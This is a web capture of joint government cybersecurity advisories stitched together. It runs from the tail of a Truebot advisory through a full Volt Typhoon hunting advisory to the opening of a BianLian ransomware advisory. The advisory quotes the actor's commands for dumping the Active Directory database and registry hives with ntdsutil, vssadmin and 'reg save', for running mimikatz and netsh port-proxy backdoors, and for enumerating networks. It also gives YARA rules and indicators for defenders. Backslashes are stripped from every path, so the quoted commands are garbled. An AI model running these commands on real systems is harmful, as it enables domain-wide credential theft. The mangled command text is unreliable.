• CISA: Cross-Sector Cybersecurity Performance Goals
• CL0P Ransomware Uses Truebot Malware for Access to Networks
• Field Offices – FBI
• NSA – Zero Trust Maturity Model

REFERENCES

[1] Bishop Fox: Netwrix Auditor Advisory
[2] Talos Intelligence: Breaking the Silence – Recent Truebot Activity
[3] The DFIR Report: Truebot Deploys Cobalt Strike and FlawedGrace
[4] MAR-10445155-1.v1 .CLEAR Truebot Activity Infects U.S. and Canada Based Networks
[5] Red Canary: Raspberry Robin Delivery Vector
[6] Microsoft: Raspberry Robin Worm Part of a Larger Ecosystem Pre-Ransomware Activity
[7] Telsy: FlawedGrace RAT
[8] VMware Security Blog: Carbon Black’s Truebot Detection
[9] GitHub: DFIR Report – Truebot Malware YARA Rule

Additional Sources

Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors (thehackernews.com)
Truebot Analysis Part 1
Truebot Analysis Part 2
Truebot Analysis Part 3
Truebot Exploits Netwrix Vulnerability
TrueBot malware delivery evolves, now infects businesses in the US and elsewhere 
Malpedia-Silence Downloader
Printer spooling: what is it and how to fix it? | PaperCut

ACKNOWLEDGEMENTS

VMware’s Carbon Black contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, and co-sealers.

Summary

The United States and international cybersecurity authorities are issuing this joint Cybersecurity Advisory (CSA) to highlight a recently discovered cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.

This advisory from the United States National Security Agency (NSA), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Federal Bureau of Investigation (FBI), the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), the Communications Security Establishment’s Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK) (hereafter referred to as the “authoring agencies”) provides an overview of hunting guidance and associated best practices to detect this activity.

One of the actor’s primary tactics, techniques, and procedures (TTPs) is living off the land, which uses built-in network administration tools to perform their objectives. This TTP allows the actor to evade detection by blending in with normal Windows system and network activities, avoid endpoint detection and response (EDR) products that would alert on the introduction of third-party applications to the host, and limit the amount of activity that is captured in default logging configurations. Some of the built-in tools this actor uses are: wmic, ntdsutil, netsh, and PowerShell. The advisory provides examples of the actor’s commands along with detection signatures to aid network defenders in hunting for this activity. Many of the behavioral indicators included can also be legitimate system administration commands that appear in benign activity. Care should be taken not to assume that findings are malicious without further investigation or other indications of compromise.

Download the PDF version of this report (723 KB)

Technical Details

This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.

Background

The authoring agencies are aware of recent People’s Republic of China (PRC) state-sponsored cyber activity and have identified potential indicators associated with these techniques. This advisory will help net defenders hunt for this activity on their systems. It provides many network and host artifacts associated with the activity occurring after the network has been initially compromised, with a focus on command lines used by the cyber actor. An Indicators of compromise (IOCs) summary is included at the end of this advisory.

Especially for living off the land techniques, it is possible that some command lines might appear on a system as the result of benign activity and would be false positive indicators of malicious activity. Defenders must evaluate matches to determine their significance, applying their knowledge of the system and baseline behavior. Additionally, if creating detection logic based on these commands, network defenders should account for variability in command string arguments, as items such as ports used may be differ across environments.

Artifacts

Network artifacts

The actor has leveraged compromised small office/home office (SOHO) network devices as intermediate infrastructure to obscure their activity by having much of the command and control (C2) traffic emanate from local ISPs in the geographic area of the victim. Owners of SOHO devices should ensure that network management interfaces are not exposed to the Internet to avoid them being re-purposed as redirectors by malicious actors. If they must be exposed to the Internet, device owners and operators should ensure they follow zero trust principles and maintain the highest level of authentication and access controls possible.

The actor has used Earthworm and a custom Fast Reverse Proxy (FRP) client with hardcoded C2 callbacks [T1090] to ports 8080, 8443, 8043, 8000, and 10443 with various filenames including, but not limited to:

cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe.

Host artifacts

Windows management instrumentation (WMI/WMIC)

The actor has executed the following command to gather information about local drives [T1082]:

cmd.exe /C "wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename"

This command does not require administrative credentials to return results. The command uses a command prompt [T1059.003] to execute a Windows Management Instrumentation Command Line (WMIC) query, collecting information about the storage devices on the local host, including drive letter, file system (e.g., new technology file system [NTFS]), free space and drive size in bytes, and an optional volume name. Windows Management Instrumentation (WMI) is a built-in Windows tool that allows a user to access management information from hosts in an enterprise environment. The command line version of WMI is called WMIC.

By default, WMI Tracing is not enabled, so the WMI commands being executed and the associated user might not be available. Additional information on WMI events and tracing can be found in the References section of the advisory.

Ntds.dit Active Directory database

The actor may try to exfiltrate the ntds.dit file and the SYSTEM registry hive from Windows domain controllers (DCs) out of the network to perform password cracking [T1003.003]. (The ntds.dit file is the main Active Directory (AD) database file and, by default, is stored at %SystemRoot%NTDSntds.dit. This file contains information about users, groups, group memberships, and password hashes for all users in the domain; the SYSTEM registry hive contains the boot key that is used to encrypt information in the ntds.dit file.) Although the ntds.dit file is locked while in use by AD, a copy can be made by creating a Volume Shadow Copy and extracting the ntds.dit file from the Shadow Copy. The SYSTEM registry hive may also be obtained from the Shadow Copy. The following example commands show the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.

cmd /c vssadmin create shadow /for=C: > C:WindowsTemp.tmp

cmd /c copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit C:WindowsTemp > C:WindowsTemp.tmp

The built-in Ntdsutil.exe tool performs all these actions using a single command. There are several ways to execute Ntdsutil.exe, including running from an elevated command prompt (cmd.exe), using WMI/WMIC, or PowerShell. Defenders should look for the execution of Ntdsutil.exe commands using long, short, or a combination of the notations. For example, the long notation command activate instance ntds ifm can also be executed using the short notation ac i ntds i. Table 1 provides the long and short forms of the arguments used in the sample Ntdsutil.exe command, along with a brief description of the arguments.

The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe. Each of the following actor commands is a standalone example; multiple examples are provided to show how syntax and file paths may differ per environment.

wmic process call create "ntdsutil "ac i ntds" ifm "create full C:WindowsTemppro

wmic process call create "cmd.exe /c ntdsutil "ac i ntds" ifm "create full C:WindowsTempPro"

wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp"

"cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:windowsTempMcAfee_Logs & ntdsutil "ac i ntds" ifm "create full C:WindowsTempMcAfee_Logs"

cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp"  1> 127.0.0.1ADMIN$ 2>&1

Note: The would be an epoch timestamp following the format like “__1684956600.123456”.

Each actor command above creates a copy of the ntds.dit database and the SYSTEM and SECURITY registry hives in the C:WindowsTemp directory, where is replaced with the path specified in the command (e.g., pro, tmp, or McAfee_Logs). By default, the hidden ADMIN$ share is mapped to C:Windows, so the last command will direct standard output and error messages from the command to a file within the folder specified.

The actor has also saved the files directly to the C:WindowsTemp and C:UsersPublic directories, so the entirety of those directory structures should be analyzed. Ntdsutil.exe creates two subfolders in the directory specified in the command: an Active Directory folder that contains the ntds.dit and ntds.jfm files, and a registry folder that contains the SYSTEM and SECURITY hives. Defenders should look for this folder structure across their network:

Active Directoryntds.dit
Active Directoryntds.jfm

registrySECURITY

registrySYSTEM

When one of the example commands is executed, several successive log entries are created in the Application log, under the ESENT Source. Associated events can be viewed in Windows Event Viewer by navigating to: Windows Logs | Application. To narrow results to relevant events, select Filter Current Log from the Actions menu on the right side of the screen. In the Event sources dropdown, check the box next to ESENT, then limit the logs to ID numbers 216, 325, 326, and 327. Clicking the OK box will apply the filters to the results.

Since ESENT logging is used extensively throughout Windows, defenders should focus on events that reference ntds.dit. If such events are present, the events’ details should contain the file path where the file copies were created. Since these files can be deleted, or enhanced logging may not be configured on hosts, the file path can greatly aid in a hunt operation. Identifying the user associated with this activity is also a critical step in a hunt operation as other actions by the compromised—or actor-created—user account can be helpful to understand additional actor TTPs, as well as the breadth of the actor’s actions.

Note: If an actor can exfiltrate the ntds.dit and SYSTEM registry hive, the entire domain should be considered compromised, as the actor will generally be able to crack the password hashes for domain user accounts, create their own accounts, and/or join unauthorized systems to the domain. If this occurs, defenders should follow guidance for removing malicious actors from victim networks, such as CISA’s Eviction Guidance for Network Affected by the SolarWinds and Active Directory/M365 Compromise.

In addition to the above TTPs used by the actor to copy the ntds.dit file, the following tools could be used by an actor to obtain the same information:

• Secretsdump.py
  • Note: This script is a component of Impacket, which the actor has been known to use
• Invoke-NinjaCopy (PowerShell)
• DSInternals (PowerShell)
• FgDump
• Metasploit

Best practices for securing ntds.dit include hardening Domain Controllers and monitoring event logs for ntdsutil.exe and similar process creations. Additionally, any use of administrator privileges should be audited and validated to confirm the legitimacy of executed commands.

PortProxy

The actor has used the following commands to enable port forwarding [T1090] on the host:

"cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress= connectport=8443 protocol=tcp""

"cmd.exe /c netsh interface portproxy add v4tov4 listenport=50100 listenaddress=0.0.0.0 connectport=1433 connectaddress="

where is replaced with an IPv4 address internal to the network, omitting the ’s.

Netsh is a built-in Windows command line scripting utility that can display or modify the network settings of a host, including the Windows Firewall. The portproxy add command is used to create a host:port proxy that will forward incoming connections on the provided listenaddress and listenport to the connectaddress and connectport. Administrative privileges are required to execute the portproxy command. Each portproxy command above will create a registry key in the HKLMSYSTEMCurrentControlSetServicesPortProxyv4tov4tcp path. Defenders should look for the presences of keys in this path and investigate any anomalous entries.

Note: Using port proxies is not common for legitimate system administration since they can constitute a backdoor into the network that bypasses firewall policies. Administrators should limit port proxy usage within environments and only enable them for the period of time in which they are required.

Defenders should also use unusual IP addresses and ports in the command lines or registry entries to identify other hosts that are potentially included in actor actions. All hosts on the network should be examined for new and unusual firewall and port forwarding rules, as well as IP addresses and ports specified by the actor. If network traffic or logging is available, defenders should attempt to identify what traffic was forwarded though the port proxies to aid in the hunt operation. As previously mentioned, identifying the associated user account that made the networking changes can also aid in the hunt operation.

Firewall rule additions and changes can be viewed in Windows Event Viewer by navigating to:

Applications and Service Logs | Microsoft | Windows | Windows Firewall With Advanced Security | Firewall.

In addition to host-level changes, defenders should review perimeter firewall configurations for unauthorized changes and/or entries that may permit external connections to internal hosts. The actor is known to target perimeter devices in their operations. Firewall logs should be reviewed for any connections to systems on the ports listed in any portproxy commands discovered.

PowerShell

The actor has used the following PowerShell [T1059.001] command to identify successful logons to the host [T1033]:

Get-EventLog security -instanceid 4624

Note: Event ID 4624 is logged when a user successfully logs on to a host and contains useful information such as the logon type (e.g., interactive or networking), associated user and computer account names, and the logon time. Event ID 4624 entries can be viewed in Windows Event Viewer by navigating to:

Windows Logs | Security. PowerShell logs can be viewed in Event Viewer: Applications and Service Logs | Windows PowerShell.

This command identifies what user account they are currently leveraging to access the network, identify other users logged on to the host, or identify how their actions are being logged. If the actor is using a password spray technique [T1110.003], there may be several failed logon (Event ID 4625) events for several different user accounts, followed by one or more successful logons (Event ID 4624) within a short period of time. This period may vary by actor but can range from a few seconds to a few minutes.

If the actor is using brute force password attempts [T1110] against a single user account, there may be several Event ID 4625 entries for that account, followed by a successful logon Event ID 4624. Defenders should also look for abnormal account activity, such as logons outside of normal working hours and impossible time-and-distance logons (e.g., a user logging on from two geographically separated locations at the same time).

Impacket

The actor regularly employs the use of Impacket’s wmiexec, which redirects output to a file within the victim host’s ADMIN$ share (C:Windows) containing an epoch timestamp in its name. The following is an example of the “dir” command being executed by wmiexec.py:

cmd.exe /Q /c *dir 1> 127.0.0.1ADMIN$__1684956600.123456 2>&1

Note: Discovery of an entry similar to the example above in the Windows Event Log and/or a file with a name in a similar format may be evidence of malicious activity and should be investigated further. In the event that only a filename is discovered, the epoch timestamp within the filename reflects the time of execution by default and can be used to help scope threat hunting activities.

Enumeration of the environment

The following commands were used by the actor to enumerate the network topology [T1016], the active directory structure [T1069.002], and other information about the target environment [T1069.001], [T1082]:

arp -a

curl www.ip-api.com

dnscmd . /enumrecords /zone {REDACTED}

dnscmd . /enumzones

dnscmd /enumrecords {REDACTED} . /additional

ipconfig /all

ldifde.exe -f c:windowstemp.txt -p subtree

net localgroup administrators

net group /dom

net group "Domain Admins" /dom

netsh interface firewall show all

netsh interface portproxy show all

netsh interface portproxy show v4tov4

netsh firewall show all

netsh portproxy show v4tov4

netstat -ano

reg query hklmsoftware

systeminfo

tasklist /v

whoami

wmic volume list brief

wmic service brief

wmic product list brief

wmic baseboard list full

wevtutil qe security /rd:true /f:text /q:*[System[(EventID=4624) and TimeCreated[@SystemTime>='{REDACTED}']] and EventData[Data='{REDACTED}']]

Additional credential theft

The actor also used the following commands to identify additional opportunities for obtaining credentials in the environment [T1555], [T1003]:

dir C:Users{REDACTED}.sshknown_hosts

dir C:users{REDACTED}appdataroamingMozillafirefoxprofiles

     mimikatz.exe

reg query hklmsoftwareOpenSSH

reg query hklmsoftwareOpenSSHAgent

reg query hklmsoftwarerealvnc

reg query hklmsoftwarerealvncvncserver

reg query hklmsoftwarerealvncAllusers

reg query hklmsoftwarerealvncAllusersvncserver

reg query hkcusoftware{REDACTED}puttysession

reg save hklmsam ss.dat

reg save hklmsystem sy.dat

Additional commands

The actor executed the following additional commands:

7z.exe a -p {REDACTED} c:windowstemp{REDACTED}.7z

C:Windowssystem32pcwrun.exe C:UsersAdministratorDesktopWin.exe

C:WindowsSystem32cmdbak.exe /c ping -n 1 127.0.0.1 >

C:Windowstempputty.log

C:WindowsTemptmp.log

"cmd.exe" /c dir 127.0.0.1C$ /od

"cmd.exe" /c ping –a –n 1 

"cmd.exe" /c wmic /user: /password: process call create "net stop "" > C:WindowsTemptmp.log"

cmd.exe /Q /c cd 1> 127.0.0.1ADMIN$__ 2 2>&1

net use 127.0.0.1IPC$ /y /d

powershell start-process -filepath c:windowstemp.bat -windowstyle Hidden

rar.exe a –{REDACTED} c:Windowstemp{REDACTED} D:{REDACTED}

wmic /node:{REDACTED} /user:{REDACTED} /password:{REDACTED} cmd /c whoami

xcopy C:windowstemphp d:{REDACTED}

Mitigations

The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity Frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

• Defenders should harden domain controllers and monitor event logs [2.T] for ntdsutil.exe and similar process creations. Additionally, any use of administrator privileges should be audited and validated to confirm the legitimacy of executed commands.
• Administrators should limit port proxy usage within environments and only enable them for the period of time in which they are required [2.X].
• Defenders should investigate unusual IP addresses and ports in command lines, registry entries, and firewall logs to identify other hosts that are potentially involved in actor actions.
• In addition to host-level changes, defenders should review perimeter firewall configurations for unauthorized changes and/or entries that may permit external connections to internal hosts.
• Defenders should also look for abnormal account activity, such as logons outside of normal working hours and impossible time-and-distance logons (e.g., a user logging on from two geographically separated locations at the same time).
• Defenders should forward log files to a hardened centralized logging server, preferably on a segmented network [2.F].

Logging recommendations

To be able to detect the activity described in this CSA, defenders should set the audit policy for Windows security logs to include “audit process creation” and “include command line in process creation events” in addition to accessing the logs. Otherwise, the default logging configurations may not contain the necessary information.

Enabling these options will create Event ID 4688 entries in the Windows Security log to view command line processes. Given the cost and difficulty of logging and analyzing this kind of activity, if an organization must limit the requirements, they should focus on enabling this kind of logging on systems that are externally facing or perform authentication or authorization, especially including domain controllers.

To hunt for the malicious WMI and PowerShell activity, defenders should also log WMI and PowerShell events. By default, WMI Tracing and deep PowerShell logging are not enabled, but they can be enabled by following the configuration instructions linked in the References section.

The actor takes measures to hide their tracks, such as clearing logs [T1070.001]. To ensure log integrity and availability, defenders should forward log files to a hardened centralized logging server, preferably on a segmented network. Such an architecture makes it harder for an actor to cover their tracks as evidence of their actions will be captured in multiple locations.

Defenders should also monitor logs for Event ID 1102, which is generated when the audit log is cleared. All Event ID 1102 entries should be investigated as logs are generally not cleared and this is a known actor tactic to cover their tracks. Even if an event log is cleared on a host, if the logs are also stored on a logging server, the copy of the log will be preserved.

This activity is often linked to malicious exploitation of edge devices and network management devices. Defenders should enable logging on their edge devices, to include system logs, to be able to identify potential exploitation and lateral movement. They should also enable network-level logging, such as sysmon, webserver, middleware, and network device logs.

Indicators of compromise (IOCs) summary

TTPs

• Exploiting vulnerabilities [T1190] in widely used software including, but not limited to:
  • CVE-2021-40539—ManageEngine ADSelfService Plus.
    https://www.cisa.gov/uscert/ncas/alerts/aa21-259a.
  • CVE-2021-27860—FatPipe WARP, IPVPN, MPVPN.
    https://www.ic3.gov/Media/News/2021/211117-2.pdf.
• Using webshells for persistence and exfiltration [T1505.003], with at least some of the webshells derived from the Awen webshell.
• Using compromised Small-Office Home-Office (SOHO) devices (e.g. routers) to obfuscate the source of the activity [T1090.002].
  • Most common types include ASUS, Cisco RV, Draytek Vigor, FatPipe IPVPN/MPVPN/WARP, Fortinet Fortigate, Netgear Prosafe, and Zyxel USG devices.
  • Common CVEs for these devices and mitigation guidance can be found in the joint Cybersecurity Advisory, “Top CVEs Actively Exploited by People’s Republic of China State-Sponsored Cyber Actors.”
• Using living off the land tools for discovery, lateral movement, and collection activities, to include:
  • certutil
  • dnscmd
  • ldifde
  • makecab
  • net user/group/use
  • netsh
  • nltest
  • ntdsutil
  • PowerShell
  • req query/save
  • systeminfo
  • tasklist
  • wevtutil
  • wmic
  • xcopy
• Selective clearing of Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity [T1546].
• Using open source “hacktools” tools, such as:
  • Fast Reverse Proxy (frp) – Probably derived from the publicly-available fatedier and EarthWorm variants.
  • Impacket – To detect Impacket usage, see the joint Cybersecurity Advisory: “Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization”.
  • Mimikatz.exe
  • Remote administration tools – Defenders should consult the joint Cybersecurity Advisory: “Protecting Against Malicious Use of Remote Monitoring and Management Software“.

Command execution

File names and directory paths used in these commands are only meant to serve as examples. Actual names and paths may differ depending on environment and activity, so defenders should account for variants when performing queries.

Note: Many of the commands are derivatives of common system administration commands that could generate false positives when used alone without additional indicators.

7z.exe a -p {REDACTED} c:windowstemp{REDACTED}.7z c:windowstemp*

"C:pstoolspsexec.exe" {REDACTED} -s cmd /c "cmd.exe /c "netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999""

C:Windowssystem32pcwrun.exe C:UsersAdministratorDesktopWin.exe

cmd.exe /C dir /S {REDACTED}c$Users{REDACTED} >> c:windowstemp{REDACTED}.tmp



"cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:windowsTempMcAfee_Logs & ntdsutil "ac i ntds" ifm "create full C:WindowsTempMcAfee_Logs"

cmd.exe /Q /c *cd 1> 127.0.0.1ADMIN$__ 2>&1

cmd.exe /Q /c cd 1> 127.0.0.1ADMIN$__1652470932.9400265 2>&1

cmd.exe /Q /c net group "domain admins" /dom 1>127.0.0.1ADMIN$__ 2>&1

cmd.exe /Q /c wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp"  1> 127.0.0.1ADMIN$  2>&1

D:{REDACTED}xcopy C:windowstemphp d:{REDACTED}

Get-EventLog security -instanceid 4624

ldifde.exe -f c:windowstempcisco_up.txt -p subtree

makecab ..backup210829-020000.zip ..webappsadssphtmlLock.lic

move "c$userspublicAppfileregistrySYSTEM" ..backup210829-020000.zip

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress={REDACTED} connectport=8443 protocol=tcp

netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999



Rar.exe a –{REDACTED} c:WindowstempDMBC2C61.tmp

start-process -filepath c:windowstemp.bat -windowstyle hidden 1

Note: The batch file in question (.bat) could use any name, and no discernable pattern has been determined at this time.

wmic process call create "cmd.exe /c mkdir C:userspublicAppfile & ntdsutil "ac i ntds" ifm "create full C:userspublicAppfile" q q

wmic process call create "cmd.exe /c mkdir C:WindowsTemptmp & ntdsutil "ac i ntds" ifm "create full C:WindowsTemptmp"

wmic process call create "cmd.exe /c ntdsutil "ac i ntds" ifm "create full C:WindowsTempPro"

wmic process call create "ntdsutil "ac i ntds" ifm "create full C:WindowsTemp"

Command line patterns

Certain patterns in commands (with asterisks for wildcards) can be used to identify potentially malicious commands:

• cmd.exe /C dir /S * >> *
• cmd.exe /Q /c * 1> 127.0.0.1ADMIN$__*.*>&1
• powershell start-process -filepath c:windowstemp*.exe -windowstyle hidden

File paths

The most common paths where files and executables used by the actor have been found include:

• C:UsersPublicAppfile (including subdirectories)
• C:Perflogs (including subdirectories)
• C:WindowsTemp (including subdirectories)

File names

The file names the actor has previously used for such things as malware, scripts, and tools include:

In addition to the file names and paths above, malicious files names, believed to be randomly created, in the following format have also been discovered:

C:Windows[a-zA-Z]{8}.exe

SHA-256 file hashes

• f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd

• ef09b8ff86c276e9b475a6ae6b54f08ed77e09e169f7fc0872eb1d427ee27d31

• d6ebde42457fe4b2a927ce53fc36f465f0000da931cfab9b79a36083e914ceca

• 472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d

• 66a19f7d2547a8a85cee7a62d0b6114fd31afdee090bd43f36b89470238393d7

• 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71

• 41e5181b9553bbe33d91ee204fe1d2ca321ac123f9147bb475c0ed32f9488597

• c7fee7a3ffaf0732f42d89c4399cbff219459ae04a81fc6eff7050d53bd69b99

• 3a9d8bb85fbcfe92bae79d5ab18e4bca9eaf36cea70086e8d1ab85336c83945f

• fe95a382b4f879830e2666473d662a24b34fccf34b6b3505ee1b62b32adafa15

• ee8df354503a56c62719656fae71b3502acf9f87951c55ffd955feec90a11484

User-agent

In some cases, the following user-agent string (including the extra spacing) was identified performing reconnaissance activities by this actor:

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:68.0)               Gecko/20100101 Firefox/68.0

Yara rules

rule ShellJSP {

    strings:

        $s1 = "decrypt(fpath)"

        $s2 = "decrypt(fcontext)"

        $s3 = "decrypt(commandEnc)"

        $s4 = "upload failed!"

        $s5 = "aes.encrypt(allStr)"

        $s6 = "newid"


    condition:

        filesize < 50KB and 4 of them

}

rule EncryptJSP {

    strings:

        $s1 = "AEScrypt"

        $s2 = "AES/CBC/PKCS5Padding"

        $s3 = "SecretKeySpec"

        $s4 = "FileOutputStream"

        $s5 = "getParameter"

        $s6 = "new ProcessBuilder"

        $s7 = "new BufferedReader"

        $s8 = "readLine()"


    condition:

        filesize < 50KB and 6 of them

}

rule CustomFRPClient {

   meta:

        description=”Identify instances of the actor's custom FRP tool based on unique strings chosen by the actor and included in the tool”

   strings:

        $s1 = "%!PS-Adobe-" nocase ascii wide

        $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide

        $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide

        $s4 = "MAGA2024!!!" nocase ascii wide

        $s5 = "HTTP_PROXYHost: %s" nocase ascii wide

  

   condition:

        all of them

}

rule HACKTOOL_FRPClient {

   meta:

        description=”Identify instances of FRP tool (Note: This tool is known to be used by multiple actors, so hits would not necessarily imply activity by the specific actor described in this report)”

   strings:

        $s1 = "%!PS-Adobe-" nocase ascii wide

        $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide

        $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide

        $s4 = "HTTP_PROXYHost: %s" nocase ascii wide

  

   condition:

        3 of them

}

References

Active Directory and domain controller hardening:

• Best practices: https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory

CISA regional cyber threats:

• PRC state-sponsored activity: China Cyber Threat Overview and Advisories

Microsoft Threat Intelligence blog:

• Volt Typhoon activity: https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

Ntdsutil.exe:

• Overview: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753343(v=ws.11)

PowerShell:

• Best practices: https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF
• Logging configuration: https://www.mandiant.com/resources/blog/greater-visibility

Windows command line process auditing:

• Overview: https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing

Windows Defender Firewall:

• Best practices: https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-firewall/best-practices-configuring
• Logging configuration: https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-firewall/configure-the-windows-firewall-log

Windows management instrumentation:

• Events: https://learn.microsoft.com/en-us/windows/win32/wmisdk/tracing-wmi-activity#obtaining-wmi-events-through-event-viewer
• Tracing activity: https://learn.microsoft.com/en-us/windows/win32/wmisdk/tracing-wmi-activity

Windows password spraying:

• Logging and playbook configuration: https://learn.microsoft.com/en-us/security/compass/incident-response-playbook-password-spray

Acknowledgements

The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Broadcom, Cisco Talos, Google’s Threat Analysis Group, Lumen Technologies, Mandiant, Microsoft Threat Intelligence (MSTI), Palo Alto Networks, SecureWorks, SentinelOne, Trellix, and additional industry partners for their collaboration on this advisory.

Disclaimer of endorsement

The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies’ governments, and this guidance shall not be used for advertising or product endorsement purposes.

Trademark recognition

Active Directory^®, Microsoft^®, PowerShell^®, and Windows^® are registered trademarks of Microsoft Corporation. MITRE^® and ATT&CK^® are registered trademarks of The MITRE Corporation.

Purpose

This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Contact

U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/field-offices.  

NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov

NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov

NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov

Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories.

Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca.

New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.

United Kingdom organizations: Report a significant cyber security incident at ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Appendix: MITRE ATT&CK Techniques

Table 2 captures all referenced threat actor tactics and techniques in this advisory.

Summary

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) are releasing this joint Cybersecurity Advisory to disseminate known BianLian ransomare and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023.

BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is not made. BianLian group originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion.

FBI, CISA, and ACSC encourage critical infrastructure organizations and small- and medium-sized organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of BianLian and other ransomware incidents.

Download the PDF version of this report (710kb):

For a downloadable copy of IOCs (35kb), see:

Technical Details

Note: This advisory uses the MITRE ATT&CK^® for Enterprise framework, version 13. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® Tactics and Techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

